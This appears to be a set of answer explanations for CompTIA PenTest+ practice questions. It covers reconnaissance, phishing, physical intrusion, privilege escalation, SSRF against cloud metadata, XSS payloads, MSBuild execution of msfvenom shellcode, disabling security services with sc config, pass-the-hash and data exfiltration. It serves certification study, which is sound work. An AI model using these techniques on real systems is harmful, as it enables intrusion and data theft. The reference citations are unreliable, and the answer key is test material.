Hunter.io is a tool used for finding professional email addresses associated with a domain. Here’s what it provides:

Functionality of Hunter.io:

Email Address Collection: Gathers email addresses associated with a target domain from various sources across the internet.

Verification: Validates the email addresses to ensure they are deliverable.

Sources: Aggregates data from public sources, company websites, and other internet databases.

Comparison with Other Options:

DNS Records (B): Hunter.io does not focus on DNS records; tools like dig or nslookup are used for DNS information.

Data Breach Information (C): Services like Have I Been Pwned are used for data breach information.

Web Page Information (D): Tools like wget, curl, or specific web scraping tools are used for collecting detailed web page information.

Hunter.io is specifically designed to collect and validate email addresses for a given domain, making it the correct answer.

======

The correct answer is A. Whaling

Whaling is a type of phishing attack that specifically targets high-profile or senior executives, such as a CFO, CEO, CIO, or other executive-level personnel. In this scenario, the email is directed at the company’s Chief Financial Officer and uses financial pressure, urgency, and a vendor invoice theme to persuade the recipient to open an attachment or take action.

B is incorrect because phishing is a broad term for fraudulent email-based attacks, but this question specifically targets a senior executive, making whaling the better answer.

C is incorrect because spear phishing is targeted phishing against a specific person or group, but when the target is an executive-level individual such as a CFO, the more precise term is whaling.

D is incorrect because vishing involves voice-based phishing, such as phone calls or voicemail. This scenario uses email, not voice communication.

In PenTest+ terms, this falls under Attacks and Exploits, specifically social engineering, phishing techniques, and targeted executive attacks.

Wireshark is a network packet analyzer used to capture and analyze network traffic in real-time. During a penetration test, it is often used to inspect unencrypted communication to extract sensitive information like plaintext login credentials. Here ' s how it works:

Packet Capturing:Wireshark captures the network packets transmitted over a network interface. If a user logs in through an insecure communication protocol (e.g., HTTP, FTP, or Telnet), the credentials are transmitted in plaintext.

Traffic Filtering:Using filters (e.g., http, tcp.port == 21), the tester narrows down the relevant traffic to locate the login request and response packets.

Sensitive Data Extraction:Analyzing the captured packets reveals plaintext credentials in the data payload, such as in HTTP POST requests.

Exploit the Information:After extracting the plaintext credentials, the tester can attempt unauthorized access to resources using these credentials.

CompTIA Pentest+ References:

Domain 1.0 (Planning and Scoping)

Domain 2.0 (Information Gathering and Vulnerability Identification)

Wireshark Usage Guide

If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.

Packet injection (Option A):

Attackers forge and transmit fake packets to manipulate network behavior.

Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.

The best next step is to load the captured hash into John the Ripper for offline cracking. The tester already has a username and associated hash material, so the most practical action is to attempt to recover the plaintext password. Offline cracking is efficient because it does not directly interact with the target authentication service, which reduces noise and avoids account lockout risks compared with brute-force attempts using Hydra. NTLM relay would require an active relay opportunity and is not the clearest next move from the information shown. secretsdump is generally used after valid credentials or appropriate hash material are available for remote extraction, and the snippet provided does not indicate sufficient privilege or a full credential set for that step. Therefore, cracking the captured hash is the most appropriate immediate action to expand access.

RFID cloning involves copying data from an existing access card to create a duplicate badge. Attackers use tools like Proxmark3 or Flipper Zero to capture and replicate RFID signals.

Option A (Smurfing) ❌: A DDoS attack technique, unrelated to physical security.

Option B (Credential stuffing) ❌: Uses compromised usernames/passwords, not RFID badges.

Option C (RFID cloning) ✅: Correct. Creates a duplicate access badge using RFID technology.

Option D (Card skimming) ❌: Steals credit card data, but does not duplicate RFID badges.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – Physical Security Testing & RFID Cloning

The correct answer is B. ssh compromised_user@victimhost " sudo -l "

The output shown in the question is produced by the sudo -l command, which lists the commands a user is allowed to run with elevated privileges.

The key finding is:

root (NO PASSWD): /bin/vim

This means compromised_user can run /bin/vim as root without entering a password. That is a local privilege escalation risk because vim can be abused to execute commands with elevated privileges when permitted through sudo.

To validate whether another host has the same weakness, the tester should enumerate that user’s sudo privileges on the other host:

ssh compromised_user@victimhost " sudo -l "

A is incorrect because running vim only confirms that the program can execute, not that it can be run as root through sudo.

C is incorrect because running bash -c vim only starts vim through Bash and does not validate sudo permissions.

D is incorrect because listing /bin/vim only confirms the file exists and shows file permissions. The vulnerability is the sudo misconfiguration, not the presence of the vim binary.

f.readlines() returns each line including trailing newline and any extra fields (labels). Given targets.txt lines contain URL followed by a label separated by whitespace, target will contain " http://10.10.6.4/ CompTIA-MR1\n " . Concatenating that directly with api yields an invalid URL. Splitting the line on whitespace and taking the first element (target.split( " " )[0] or better target.split()[0] ) extracts just the URL (http://10.10.6.4/) before building url = target + api. This removes the descriptive label and newline so the resulting url is valid.

Why not the others:

A: Changes API format incorrectly.

C: Stripping http:// would make an invalid absolute URL for requests.post.

D: Passing api as the second positional parameter to requests.post is wrong (it expects data= or json=), and doesn’t fix the problem of extra label text in target.

PT0-003 mapping: Domain 4 — robust parsing and input sanitization when reusing scripts.

MAC address spoofing involves changing the MAC address of a network interface to mimic another device on the network. This technique is often used to bypass network access controls and gain unauthorized access to a network.

Understanding MAC Address Spoofing:

MAC Address: A unique identifier assigned to network interfaces for communication on the physical network segment.

Spoofing: Changing the MAC address to a different one, typically that of an authorized device, to gain access to restricted networks.

Purpose:

Bypassing Access Controls: Gain access to networks that use MAC address filtering as a security measure.

Impersonation: Assume the identity of another device on the network to intercept traffic or access network resources.

Tools and Techniques:

Linux Command: Use the ifconfig or ip command to change the MAC address.

Step-by-Step Explanationifconfig eth0 hw ether 00:11:22:33:44:55

Tools: Tools like macchanger can automate the process of changing MAC addresses.

Impact:

Network Access: Gain unauthorized access to networks and network resources.

Interception: Capture traffic intended for another device, potentially leading to data theft or further exploitation.

Detection and Mitigation:

Monitoring: Use network monitoring tools to detect changes in MAC addresses.

Secure Configuration: Implement port security on switches to restrict which MAC addresses can connect to specific ports.

References from Pentesting Literature:

MAC address spoofing is a common technique discussed in wireless and network security chapters of penetration testing guides.

HTB write-ups often include examples of using MAC address spoofing to bypass network access controls and gain unauthorized access.

In an authorized physical assessment, the goal is to test physical security controls. Tailgating is a common and effective technique in such scenarios. Here’s why option B is correct:

Tailgating: This involves following an authorized person into a secure area without proper credentials. During busy times, it’s easier to blend in and gain access without being noticed. It tests the effectiveness of physical access controls and security personnel.

Cloning Badge Information: This can be effective but requires proximity to employees and specialized equipment, making it more complex and time-consuming.

Picking Locks: This is a more invasive technique that carries higher risk and is less stealthy compared to tailgating.

Dropping USB Devices: This tests employee awareness and response to malicious devices but does not directly test physical access controls.

References from Pentest:

Writeup HTB: Demonstrates the effectiveness of social engineering and tailgating techniques in bypassing physical security measures​​.

Forge HTB: Highlights the use of non-invasive methods like tailgating to test physical security without causing damage or raising alarms​​.

Conclusion:

Option B, tailgating into the facility during a busy time, is the best attack plan to gain access to the facility in an authorized physical assessment.

======

SearchSploit is a command-line interface for Exploit-DB that allows testers to quickly search for known exploits based on software name and version.

With Apache 2.2.3, lighttpd 1.4.32, and MySQL, the tester can plug these into SearchSploit to identify vulnerabilities, matching the goal of finding quick attack paths with limited time.

Other tools:

msfvenom: Payload generator, not a search tool.

sqlmap: SQLi exploitation tool, useful for web apps with SQLi, but requires validation of such a vuln first.

BeEF: Browser exploitation framework, not relevant here.

CompTIA PenTest+ Reference:

PT0-003 Objective 2.2 & 2.5: Exploit and identify attack paths.

SearchSploit and Exploit-DB usage are recommended tools in CompTIA’s resources.

A false positive occurs when a vulnerability scan incorrectly flags a security issue that does not exist or is not exploitable in the context of the application. Here ' s the reasoning:

Definition of Command Injection:Command injection vulnerabilities occur when user-controllable data is passed to an interpreter or command execution context without proper sanitization, allowing an attacker to execute arbitrary commands.

Code Analysis:

The response variable is defined as a constant (const), which implies its value is immutable during runtime.

The response is not sourced from user input nor used elsewhere, meaning there is no attack surface or exploitation pathway for an attacker to influence the content of response.

Scanner Misclassification:Static Application Security Testing (SAST) tools may flag vulnerabilities based on patterns (e.g., .innerHTML usage) without assessing the source and flow of data, resulting in false positives.

Final Classification:Since the response variable is static and unchangeable, the flagged issue is not exploitable. This makes it a false positive.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Domain 4.0 (Penetration Testing Tools)

OWASP Static Code Analysis Guide

BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization ' s security defenses and response mechanisms. Here’s why option A is the best choice:

Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.

Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client ' s security tools comprehensively.

Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.

References from Pentest:

Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses​​.

Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure comprehensive coverage and minimal risk to internal systems​​.

Conclusion:

Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client ' s security tools ' effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.

======

The appropriate first step for a low-profile physical access attempt is conducting surveillance to gather information such as entry points, peak/low occupancy times, security guard patterns, camera placement, and typical foot traffic. Surveillance (visual observation, external photography, publicly available schedules) informs a safe, low-risk entry plan and helps the tester choose tactics that minimize attention.

Why not the others first:

A. Interacting with security employees to clone a badge — directly engaging security staff to manipulate them is an escalation and could alert personnel; it’s also ethically/contractually risky if done without prior scoped approval and planning.

B. Trying to enter the back door after hours on a weekend — acting without reconnaissance increases likelihood of detection or legal exposure.

C. Collecting building blueprints to run a site survey — blueprints are useful but often hard to obtain and not the initial low-effort step; surveillance provides immediate, actionable behavioral intelligence.

CompTIA PT0-003 Mapping: Physical security assessments — perform reconnaissance and site survey activities first to develop low-visibility access strategies that adhere to the engagement rules of engagement and legal constraints.

The correct answer is C. intext:

The intext: search operator is used to search for specific text within the body content of indexed web pages. Since email addresses typically appear as visible text on web pages, documents, staff directories, contact pages, PDFs, and archived pages, intext: is the best operator for locating exposed email addresses during OSINT.

For example, a tester could search for:

intext: " @example.com "

This would return pages where email addresses or domain-based email strings appear in the page content.

A is incorrect because site: limits results to a specific domain or website. It is useful when narrowing OSINT searches, but by itself it does not specifically search for email addresses.

B is incorrect because intitle: searches only page titles. Email addresses are rarely found in page titles.

D is incorrect because inurl: searches for terms in URLs. Email addresses are typically not located in URLs.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically OSINT and search engine reconnaissance for phishing preparation.

SAST is the most likely scan type because it analyzes source code, syntax, and coding patterns without executing the application. The question states that the finding is based on how a function from a Python library has been used in code, which is exactly the type of issue SAST tools are designed to detect. A deserialization weakness often appears when unsafe functions or insecure object handling are identified statically in the codebase. The statement that the scan does not consider actual input data further supports SAST, since static analysis usually flags risky usage patterns without observing live runtime behavior or real request flows. DAST focuses on behavior during execution from the outside, IAST observes the application during runtime, and SCA mainly identifies vulnerable third-party components rather than unsafe implementation logic in custom code.

==============

The correct answer is D. Secrets enumeration

When exposed cloud storage buckets are discovered, the tester should enumerate the contents for sensitive data such as API keys, access tokens, private keys, credentials, configuration files, database backups, source code, or other secrets. This is commonly referred to as secrets enumeration and is a key cloud assessment activity.

A is incorrect because protocol fingerprinting identifies protocols or services in use, but it does not help access or review bucket contents.

B is incorrect because credential brute forcing is intrusive, noisy, and often outside the expected safe approach unless explicitly authorized. The question states the buckets are exposed, so brute forcing is not the correct next step.

C is incorrect because service discovery identifies available services, but the storage buckets have already been discovered. The next step is to enumerate their accessible contents.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, specifically cloud enumeration, exposed storage review, and identifying sensitive information in publicly accessible cloud resources.

The tool and command provided by option B are used to perform passive DNS enumeration, which can uncover subdomains associated with a domain. Here’s why option B is correct:

amass enum -passive -d comptia.org: This command uses the Amass tool to perform passive DNS enumeration, effectively identifying subdomains of the target domain. The output provided (subdomains) matches what this tool and command would produce.

nslookup -type=SOA comptia.org: This command retrieves the Start of Authority (SOA) record, which does not list subdomains.

nmap -Pn -sV -vv -A comptia.org: This Nmap command performs service detection and aggressive scanning but does not enumerate subdomains.

shodan host comptia.org: Shodan is an internet search engine for connected devices, but it does not perform DNS enumeration to list subdomains.

References from Pentest:

Writeup HTB: Demonstrates the use of DNS enumeration tools like Amass to uncover subdomains during external assessments​​.

Horizontall HTB: Highlights the effectiveness of passive DNS enumeration in identifying subdomains and associated information​​.

======

The correct answer is D. gci -Path . -Recurse | Select-String -Pattern " ProjectX "

This command is the best option because it recursively searches through the current directory and its subdirectories, then uses Select-String to search file contents for the pattern " ProjectX " .

gci is an alias for Get-ChildItem. The -Recurse option is important because the Git repository contains thousands of files and directories. Without recursion, the tester would only search the current directory and miss files stored in nested folders.

Select-String is PowerShell’s equivalent of tools like grep, and it is commonly used to search for keywords, secrets, credentials, project names, API keys, or other sensitive strings inside files.

A is incorrect because gc * reads only files in the current directory and does not recursively search through subdirectories.

B is incorrect because dir /R displays alternate data streams, not a recursive content search of repository files.

C is incorrect because it uses Get-ChildItem * without -Recurse, so it will not search through all nested files and directories.

In PenTest+ terms, this falls under Tools and Code Analysis, specifically using scripting and command-line tools to search repositories for sensitive information.

Un access control vestibule (también conocido como mantrap) es una estructura de seguridad que permite que solo una persona entre a la vez a través de dos puertas controladas. Este tipo de estructura está diseñada específicamente para evitar tailgating, donde una persona no autorizada intenta entrar siguiendo a una autorizada.

No previene ataques como la clonación de credenciales (badge cloning), ni el uso de USB maliciosos, ni técnicas de lock picking.

Referencia: PT0-003 Objective 2.1 – Physical security controls, including mantraps and their use against tailgating.

A peer review process ensures that a penetration test report is accurate, unbiased, and free from errors.

Peer review (Option B):

Senior security professionals verify findings, risk levels, and remediation recommendations.

Reduces the risk of misinterpretation or incorrect data in reports.

The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:

Understanding MSBuild.exe:

Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.

Command Usage:

Command: MSBuild.exe C:\evil.xml

This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.

Comparison with Other Commands:

regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.

mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.

AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.

Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.

======

Encoding to Evade DLP:

Encoding (e.g., Base64) transforms data into a format that may bypass data loss prevention (DLP) tools.

DLP solutions often look for specific patterns (e.g., sensitive keywords, file headers) and may not recognize encoded data.

Why Not Other Options?

B (Compression): Compression reduces file size but does not typically bypass DLP detection mechanisms.

C (Encryption): Encrypted data is detectable by DLP tools, though its contents may not be readable.

D (Obfuscation): While obfuscation hides intent, encoding is more effective for bypassing automated detection.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Cross-Site Request Forgery (CSRF) vulnerabilities can be leveraged to trick authenticated users into performing unwanted actions on a web application. The right tool for this task would help in exploiting web-based vulnerabilities, particularly those related to web browsers and interactions.

Browser Exploitation Framework (BeEF) (Answer: A):

BeEF is a powerful tool specifically designed for exploiting web browser vulnerabilities. It can hook web browsers and perform a wide range of attacks, including CSRF.

Capabilities: BeEF is equipped with modules to create CSRF attacks, capture session tokens, and gather sensitive information from the target user ' s browser session.

Enviar un archivo cifrado por HTTPS es el método más eficiente, seguro y menos sospechoso para exfiltrar datos. HTTPS cifra el contenido y es un protocolo común que no genera tantas alertas en los sistemas de monitoreo.

Otras opciones como dnscat son más sigilosas pero menos eficientes y requieren control sobre la infraestructura. Steganografía o TFTP pueden ser útiles, pero FTP/TFTP son inseguros y poco usados actualmente, lo cual los hace más sospechosos.

Referencia: PT0-003 Objective 4.3 – Explain post-exploitation techniques, including data exfiltration methods.

The correct answer is C. python3 -m http.server 80

Using Python’s built-in HTTP server is one of the fastest and simplest ways to transfer files from a Linux host to another system on the same network. By running:

python3 -m http.server 80

from the directory containing the exploit, the tester can host the file over HTTP. The Windows 10 system can then retrieve it using a browser, PowerShell, certutil, or another HTTP-capable download method.

A, B, and D are incorrect because Netcat/Ncat listeners can be used for file transfer in some cases, but they require more coordination and commands on both systems. They are better suited for raw TCP connections, shells, or manual transfers, not the quickest general-purpose file-serving method.

In PenTest+ terms, this falls under Tools and Code Analysis, specifically using common command-line tools for file transfer during post-exploitation or controlled assessment activities.

In a cloud environment, testing for Server-Side Request Forgery (SSRF) vulnerabilities involves attempting to access metadata services. Here’s why the specified command is appropriate:

Accessing Cloud Metadata Service:

URL: http://169.254.169.254/latest/meta-data/ is a well-known endpoint in cloud environments (e.g., AWS) to access instance metadata.

Purpose: By exploiting SSRF to access this URL, an attacker can retrieve sensitive information such as instance credentials and other metadata.

Comparison with Other Commands:

127.0.0.1/etc/passwd: This is more about local file inclusion, not specific to cloud metadata.

< script > alert(1) < /script > : This tests for XSS, not SSRF.

127.0.0.1: This is a generic loopback address and does not specifically test for metadata access in a cloud environment.

Using curl < url > ?param=http://169.254.169.254/latest/meta-data/ is the correct approach to test for SSRF vulnerabilities in cloud environments to potentially expose secrets.

======

Correct Syntax for a Range Loop in Bash:

The seq command generates a sequence of numbers in a specified range, which is ideal for iterating over IP addresses in a Class C subnet (1–254).

Example: seq 1 254 will output numbers 1, 2, ..., 254 sequentially.

Explanation of Other Options:

A (crunch): The crunch command is used for wordlist generation and is unrelated to looping in Bash.

C (echo 1-254): This would output " 1-254 " as a string instead of generating a numeric range.

D ({1.-254}): This is incorrect Bash syntax and would result in a script error.

Final Script:

bash

for var in $(seq 1 254)

do

ping -c 1 192.168.10.$var

done

CompTIA Pentest+ References:

Domain 4.0 (Penetration Testing Tools)

Bash Scripting and Automation

If a wireless network uses weak encryption (e.g., WEP), attackers can capture and analyze packets to extract sensitive data.

Packet sniffing (Option C):

Tools like Wireshark, Aircrack-ng, and Kismet capture network packets.

Attackers analyze captured traffic to decrypt WEP encryption or extract plaintext credentials.

The presence of SMB (port 445) and MSRPC (port 135) indicates potential Windows network services that could be vulnerable to misconfigurations or exploits.

Enumerate shares and search for vulnerabilities on SMB (Option B):

SMB (Server Message Block) allows file and printer sharing. Misconfigured or open shares could contain sensitive data.

Tools like enum4linux or smbclient can be used to list available shares and check for anonymous access.

SMB vulnerabilities (e.g., EternalBlue - CVE-2017-0144) can be exploited for remote code execution.

Atomic Red Team is the best first step because it is specifically designed to automate and emulate adversary techniques in a structured, repeatable, and organization-relevant way. It maps tests to known ATT & CK techniques and allows security teams to validate detections, logging, and defensive controls using small, controlled units of adversary behavior called “atomics.” Since the goal is to automate adversarial activities from prior penetration tests that matter to the organization, using a framework built for repeatable TTP emulation is more appropriate than immediately deploying a command-and-control server or writing custom scripts from scratch. PowerView is useful for specific PowerShell-based enumeration and post-exploitation tasks, but it is not the best starting point for broad, reusable adversary emulation. Therefore, implementing Atomic Red Team is the most suitable first action.

==============

The scenario indicates that the tester’s capture device, when in monitor mode, cannot detect the target wireless network.

The most likely cause is frequency band incompatibility — if the client’s wireless infrastructure uses Wi-Fi 6E (6GHz band), and the tester’s adapter only supports 2.4GHz/5GHz, then the tester won’t see any packets or SSIDs from that band.

Why not the others:

B. Misconfiguration: While possible, the question specifies the network cannot be seen at all, pointing to hardware capability rather than misconfiguration.

C. Wrong SSID: Even with a wrong SSID, the tester would still see the beacon frames if on the same frequency band.

D. Not using Aircrack-ng: The tool used doesn’t affect whether the capture device can see the network — the adapter’s frequency support does.

CompTIA PT0-003 Mapping:

Domain 3.0: Attacks and Exploits

Wireless network attacks and troubleshooting (frequency bands, hardware compatibility, Wi-Fi 6E considerations).

In the PenTest+ pre-engagement and scoping process, a “target” refers to an asset or system component that can be assessed—such as an application, host, network segment, cloud resource, or interface that provides business functionality. An API is a valid target because it is a discrete, testable asset with defined inputs/outputs and commonly has its own authentication, authorization, rate limiting, data handling, and business-logic controls. During scoping, APIs are often explicitly listed as in-scope assets (for example, REST endpoints, GraphQL interfaces, or partner-facing integrations) because they can expose sensitive data and functionality even when the main web UI appears secure.

By contrast, HTTP and ICMP are protocols, not assets. They can be part of the assessment (e.g., testing HTTP services or ICMP filtering), but they are not themselves “targets” in the sense of scoping an asset inventory. “IPA” is not a standard target category in PenTest+ scoping language (it is typically associated with file formats or unrelated terms). Therefore, API is the correct example of a target asset.

Stakeholder Alignment:

During stakeholder alignment, the penetration tester and client discuss challenges, constraints, and objectives.

Addressing WAF interference ensures the scope and goals are adjusted or mitigated to accommodate the issue.

Why Not Other Options?

A: Goal reprioritization focuses on internal team adjustments, not client collaboration.

B: Peer review evaluates findings and methodologies but doesn’t involve clients.

C: Client acceptance occurs post-assessment, not during active engagement.

CompTIA Pentest+ References:

Domain 1.0 (Planning and Scoping)

Dynamic Application Security Testing (DAST):

Definition: DAST involves testing the application in its running state to identify vulnerabilities that could be exploited by an attacker.

Purpose: Simulates attacks on a live application, examining how it behaves and identifying security weaknesses.

ZAP (Zed Attack Proxy):

Description: An open-source DAST tool developed by OWASP.

Features: Capable of scanning web applications for vulnerabilities, including SQL injection, XSS, CSRF, and other common web application vulnerabilities.

Usage: Ideal for dynamic testing as it interacts with the live application and identifies vulnerabilities that may not be visible in static code analysis.

Other Tools:

Mimikatz: Used for post-exploitation activities, specifically credential dumping on Windows systems.

OllyDbg: A debugger used for reverse engineering and static analysis of binary files, not suitable for dynamic testing.

SonarQube: A static code analysis tool used for SAST (Static Application Security Testing), not for dynamic testing.

Pentest References:

Web Application Security Testing: Utilizing DAST tools like ZAP to dynamically test and find vulnerabilities in running web applications.

OWASP Tools: Leveraging open-source tools recommended by OWASP for comprehensive security testing.

By using ZAP, the penetration tester can perform dynamic testing to identify runtime vulnerabilities in web applications, extending the scope of the vulnerability search.

======

Penetration testers search for hardcoded credentials, API keys, and authentication tokens in source code repositories to identify secrets leakage.

Secrets scanning (Option B):

The find and egrep command scans all files recursively for sensitive keywords like " token, " " key, " and " login " .

Attackers use tools like TruffleHog and GitLeaks to automate secret discovery.

XSS Attack Explanation:

The payload exploits Cross-Site Scripting (XSS) by injecting obfuscated JavaScript into the application. When rendered, the browser executes the malicious code (e.g., alert( ' pwned ' )).

Obfuscation ( < sCRitP > instead of < script > ) attempts to bypass naive input filters.

Countermeasure:

Implement input sanitization to ensure all user inputs are properly validated and escaped before being processed or rendered.

Other measures include using Content Security Policies (CSP) and output encoding.

Why Not Other Options?

A: This is not arbitrary code execution; it is a browser-based attack.

B: XSS is unrelated to SQL injection.

C: Cross-Site Request Forgery (CSRF) is a different vulnerability targeting session handling, not script injection.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

OWASP XSS Prevention Cheat Sheet

The tester is using Mimikatz to dump cached credentials from Local Security Authority (LSA) memory.

Pass-the-Hash (Option C):

The tester extracts cached credentials to authenticate without cracking passwords.

Pass-the-Hash (PtH) allows lateral movement by reusing the NTLM hash on other systems.

When considering efficiency and security for exfiltrating sensitive data, the chosen method must ensure data confidentiality and minimize the risk of detection. Here’s an analysis of each option:

Use steganography and send the file over FTP (Option A):

Steganography hides data within other files, such as images. FTP is a protocol for transferring files.

Drawbacks: FTP is not secure as it transmits data in clear text, making it susceptible to interception. Steganography can add an extra layer of obfuscation, but the use of FTP makes this option insecure.

Compress the file and send it using TFTP (Option B):

TFTP is a simple file transfer protocol that lacks encryption.

Drawbacks: TFTP is inherently insecure because it does not support encryption, making it easy for attackers to intercept the data during transfer.

Split the file in tiny pieces and send it over dnscat (Option C):

dnscat is a tool for tunneling data over DNS.

Drawbacks: While effective at evading detection by using DNS, splitting the file and managing the reassembly adds complexity. Additionally, large data transfers over DNS can raise suspicion.

Encrypt and send the file over HTTPS (Answer: D):

Encrypting the file ensures that its contents are protected during transfer. HTTPS provides a secure, encrypted channel for communication over the internet.

Advantages: HTTPS is widely used and trusted, making it less likely to raise suspicion. Encryption ensures the data remains confidential during transit.

Command Explanation:

The sc config command is used to configure service startup settings in Windows. Using start=disabled will permanently disable a specific service, effectively turning off protections such as antivirus or other monitoring services.

Why Not Other Options?

B (sc query state= all): This command lists all services and their states but does not disable or modify any service.

C (pskill): This command is used to terminate a process temporarily, but it does not permanently disable the service.

D (net config): This command is used for configuring network settings, not for managing services.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Windows Service Exploitation Guidelines

Configuring and Registering a Service:

Registering a malicious service ensures that it starts automatically with the system, providing persistence even after reboots.

This method is stealthier than others and is commonly used in advanced persistent threat (APT) scenarios.

Why Not Other Options?

B (Remote desktop software): Installing such software is noisy and can easily be detected by monitoring tools.

C (User logon script): While it provides persistence, it is less reliable and more detectable than a system service.

D (Kerberoasting): This is a credential-stealing technique and does not establish persistence.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Domain 4.0 (Penetration Testing Tools)

In a pin tumbler lock, the key interacts with a series of pins within the lock cylinder. Here’s a detailed breakdown:

Components of a Pin Tumbler Lock:

Key Pins: These are the pins that the key directly interacts with. The cuts on the key align these pins.

Driver Pins: These are pushed by the springs and sit between the key pins and the springs.

Springs: These apply pressure to the driver pins.

Plug: This is the part of the lock that the key is inserted into and turns when the correct key is used.

Cylinder: The housing for the plug and the pins.

Operation:

When the correct key is inserted, the key pins are pushed up by the key’s cuts to align with the shear line (the gap between the plug and the cylinder).

The alignment of the pins at the shear line allows the plug to turn, thereby operating the lock.

Why Pins Are the Correct Answer:

The correct key aligns the key pins and driver pins to the shear line, allowing the plug to turn. If any pin is not correctly aligned, the lock will not open.

Illustration in Lock Picking:

Lock picking involves manipulating the pins so they align at the shear line without the key. This demonstrates the critical role of pins in the functioning of the lock.

======

When developing a phishing campaign, the tester should first use social media to gather information about the targets.

Social Media:

Purpose: Social media platforms like LinkedIn, Facebook, and Twitter provide valuable information about individuals, including their job roles, contact details, interests, and connections.

Reconnaissance: This information helps craft convincing and targeted phishing emails, increasing the likelihood of success.

Process:

Gathering Information: Collect details about the target employees, such as their names, job titles, email addresses, and any personal information that can make the phishing email more credible.

Crafting Phishing Emails: Use the gathered information to personalize phishing emails, making them appear legitimate and relevant to the recipients.

Other Options:

Shoulder Surfing: Observing someone’s screen or keyboard input to gain information, not suitable for gathering broad information for a phishing campaign.

Recon-ng: A tool for automated reconnaissance, useful but more general. Social media is specifically targeted for gathering personal information.

Password Dumps: Using previously leaked passwords to find potential targets is more invasive and less relevant to the initial stage of developing a phishing campaign.

Pentest References:

Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email.

OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on targets, including through social media.

By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.

======

The tester gained information by listening to a private discussion, which is eavesdropping (passive reconnaissance).

Option A (Eavesdropping) ✅: Correct.

Involves intercepting conversations via audio, network traffic, or wireless signals.

Option B (Bluesnarfing) ❌: Stealing data via Bluetooth, which is not mentioned.

Option C (Credential harvesting) ❌: No password collection occurred.

Option D (SQL injection) ❌: SQLi affects databases, not voice communications.

???? Reference: CompTIA PenTest+ PT0-003 Official Guide – OSINT & Eavesdropping Techniques

Upon discovering evidence of an advanced persistent threat (APT) on the network, the penetration tester should report the finding immediately.

Advanced Persistent Threat (APT):

Definition: APTs are prolonged and targeted cyberattacks in which an intruder gains access to a network and remains undetected for an extended period.

Significance: APTs often involve sophisticated tactics, techniques, and procedures (TTPs) aimed at stealing data or causing disruption.

Immediate Reporting:

Criticality: Discovering an APT requires immediate attention from the organization’s security team due to the potential impact and persistence of the threat.

Chain of Command: Following the protocol for reporting such findings ensures that appropriate incident response measures are initiated promptly.

Other Actions:

Analyzing the Finding: While analysis is important, it should be conducted by the incident response team after reporting.

Removing the Threat: This action should be taken by the organization’s security team following established incident response procedures.

Documenting and Continuing Testing: Documentation is crucial, but the immediate priority should be reporting the APT to ensure prompt action.

Pentest References:

Incident Response: Understanding the importance of immediate reporting and collaboration with the organization’s security team upon discovering critical threats like APTs.

Ethical Responsibility: Following ethical guidelines and protocols to ensure the organization can respond effectively to significant threats.

By reporting the finding immediately, the penetration tester ensures that the organization’s security team is alerted to the presence of an APT, allowing them to initiate an appropriate incident response.

======

Tailgating is the term used to describe a situation where a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee.

Tailgating:

Definition: Tailgating occurs when an unauthorized person follows an authorized person into a restricted area without the latter’s consent or knowledge. The authorized person typically opens a door or checkpoint, and the unauthorized person slips in behind them.

Example: An attacker waits near the entrance of a building and enters right after an employee, bypassing security measures.

Physical Security:

Importance: Physical security is a crucial aspect of overall security posture. Tailgating exploits human factors and weaknesses in physical security controls.

Prevention: Security measures such as turnstiles, mantraps, and security personnel can help prevent tailgating.

Pentest References:

Physical Penetration Testing: Tailgating is a common technique used in physical penetration tests to assess the effectiveness of an organization’s physical security controls.

Social Engineering: Tailgating often involves social engineering, where the attacker relies on the politeness or unawareness of the employee to gain unauthorized access.

By understanding and using tailgating, penetration testers can evaluate the effectiveness of an organization’s physical security measures and identify potential vulnerabilities that could be exploited by malicious actors.

======

The unauthorized reprinting of ID badges suggests the penetration tester is attempting physical security penetration testing to gain long-term access.

Option A (Obtain long-term, valid access) ✅: Correct. Cloning or reprinting badges allows persistent access past security checks.

Option B (Disrupt availability) ❌: There is no indication of a denial-of-service attack.

Option C (Change access for valid users) ❌: The goal is not modifying user access, but rather gaining unauthorized access.

